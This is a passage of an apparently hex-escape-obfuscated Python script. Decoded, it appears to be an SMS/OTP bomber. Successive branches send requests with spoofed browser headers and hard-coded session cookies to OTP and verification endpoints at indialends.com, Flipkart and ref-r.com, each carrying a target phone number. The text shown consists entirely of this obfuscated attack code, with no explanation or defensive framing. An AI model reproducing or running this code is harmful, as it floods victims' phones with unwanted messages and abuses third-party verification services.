27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x72\x6c\x27\x3a\x20\x27\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x72\x65\x66\x65\x72\x72\x61\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x52\x52\x41\x66\x66\x69\x6e\x69\x74\x79\x27\x3a\x20\x27\x37\x34\x37\x65\x30\x63\x32\x36\x36\x34\x66\x35\x63\x62\x36\x31\x37\x39\x35\x38\x33\x39\x36\x33\x64\x38\x33\x34\x66\x34\x38\x39\x39\x65\x65\x65\x39\x66\x36\x63\x38\x64\x63\x63\x37\x37\x33\x66\x63\x30\x35\x63\x65\x34\x35\x66\x61\x30\x36\x62\x32\x34\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x36\x39\x36\x32\x33\x37\x30\x35\x2e\x31\x35\x36\x30\x36\x36\x30\x34\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x73\x5f\x70\x6c\x62\x74\x27\x3a\x20\x27\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x37\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x70\x65\x72\x73\x6f\x6e\x61\x6c\x2d\x6c\x6f\x61\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x65\x79\x64\x65\x72\x30\x33\x74\x65\x61\x65\x61\x72\x65\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x72\x74\x79\x73\x76\x66\x6a\x37\x34\x73\x6a\x65\x27\x3a\x20\x63\x63\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6a\x66\x73\x64\x66\x75\x31\x34\x68\x6b\x67\x65\x72\x74\x64\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6a\x38\x30\x67\x65\x72\x74\x64\x66\x67\x27\x3a\x20\x27\x30\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x61\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x76\x32\x2e\x61\x73\x68\x78\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x6c\x6f\x67\x69\x6e\x49\x64\x22\x3a\x5b\x22\x2b\x22\x2b\x63\x63\x2b\x70\x6e\x5d\x2c\x22\x73\x75\x70\x70\x6f\x72\x74\x41\x6c\x6c\x53\x74\x61\x74\x65\x73\x22\x3a\x74\x72\x75\x65\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x36\x2f\x75\x73\x65\x72\x2f\x73\x69\x67\x6e\x75\x70\x2f\x73\x74\x61\x74\x75\x73\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x37\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x54\x27\x3a\x20\x27\x42\x52\x25\x33\x41\x63\x6a\x76\x71\x7a\x68\x67\x6c\x75\x31\x6d\x7a\x74\x39\x35\x61\x79\x64\x7a\x68\x76\x77\x7a\x71\x31\x2e\x31\x35\x35\x38\x30\x33\x31\x30\x39\x32\x30\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x57\x41\x42\x27\x3a\x20\x27\x62\x75\x69\x6c\x64\x2d\x34\x34\x62\x65\x39\x65\x34\x37\x34\x36\x31\x61\x37\x34\x64\x37\x33\x37\x39\x31\x34\x32\x30\x37\x62\x63\x62\x61\x66\x63\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x75\x78\x5f\x75\x69\x64\x27\x3a\x20\x27\x31\x35\x35\x38\x36\x37\x39\x30\x34\x33\x38\x31\x38\x39\x32\x39\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x53\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x2d\x32\x32\x37\x31\x39\x36\x32\x35\x31\x25\x37\x43\x4d\x43\x49\x44\x54\x53\x25\x37\x43\x31\x38\x30\x34\x31\x25\x37\x43\x4d\x43\x4d\x49\x44\x25\x37\x43\x36\x33\x32\x37\x33\x33\x35\x33\x30\x33\x35\x35\x30\x39\x33\x30\x34\x35\x37\x36\x39\x32\x37\x37\x31\x39\x32\x30\x33\x39\x34\x38\x39\x33\x33\x32\x34\x36\x25\x37\x43\x4d\x43\x41\x49\x44\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x4f\x50\x54\x4f\x55\x54\x2d\x31\x35\x35\x38\x36\x38\x36\x32\x34\x35\x73\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x41\x41\x4d\x4c\x48\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x31\x32\x25\x37\x43\x4d\x43\x41\x41\x4d\x42\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x6a\x38\x4f\x64\x76\x36\x4c\x6f\x6e\x4e\x34\x72\x33\x61\x6e\x37\x4c\x68\x44\x33\x57\x5a\x72\x55\x31\x62\x55\x70\x41\x6b\x46\x6b\x6b\x69\x59\x31\x6e\x63\x42\x52\x39\x36\x74\x32\x50\x54\x49\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x63\x63\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x4e\x27\x3a\x20\x27\x32\x2e\x56\x49\x38\x30\x38\x35\x41\x36\x41\x32\x33\x37\x45\x42\x34\x43\x36\x32\x38\x33\x36\x43\x38\x38\x30\x39\x46\x30\x44\x33\x31\x32\x45\x42\x2e\x53\x49\x32\x31\x41\x39\x45\x43\x34\x45\x39\x39\x42\x39\x34\x39\x42\x32\x41\x43\x45\x36\x33\x36\x31\x42\x33\x46\x30\x32\x30\x38\x43\x43\x2e\x56\x53\x31\x38\x37\x36\x34\x39\x42\x32\x42\x30\x36\x41\x34\x34\x43\x36\x39\x38\x32\x34\x30\x30\x36\x37\x31\x30\x43\x42\x36\x44\x38\x33\x2e\x31\x35\x35\x38\x36\x37\x39\x30\x37\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x27\x3a\x20\x27\x48\x6f\x6d\x65\x50\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x5f\x74\x27\x3a\x20\x27\x48\x6f\x6d\x65\x70\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x27\x3a\x20\x27\x64\x31\x74\x31\x37\x47\x51\x56\x71\x50\x7a\x39\x4b\x50\x7a\x6f\x62\x50\x33\x4d\x34\x47\x51\x6b\x6a\x50\x79\x33\x34\x54\x6a\x66\x4a\x78\x49\x34\x53\x62\x58\x56\x49\x76\x68\x77\x7a\x6d\x33\x6d\x45\x31\x33\x76\x66\x53\x45\x75\x6c\x6d\x66\x39\x30\x44\x2f\x37\x4c\x37\x31\x30\x71\x55\x70\x4d\x71\x38\x6d\x41\x30\x6b\x32\x62\x78\x36\x62\x32\x44\x75\x77\x49\x53\x34\x67\x3d\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x73\x71\x27\x3a\x20\x27\x25\x35\x42\x25\x35\x42\x42\x25\x35\x44\x25\x35\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x36\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6f\x67\x69\x6e\x49\x64\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x74\x61\x74\x65\x27\x3a\x20\x27\x56\x45\x52\x49\x46\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x68\x75\x72\x6e\x45\x6d\x61\x69\x6c\x52\x65\x71\x75\x65\x73\x74\x27\x3a\x20\x27\x66\x61\x6c\x73\x65\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x35\x2f\x75\x73\x65\x72\x2f\x6f\x74\x70\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x38\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\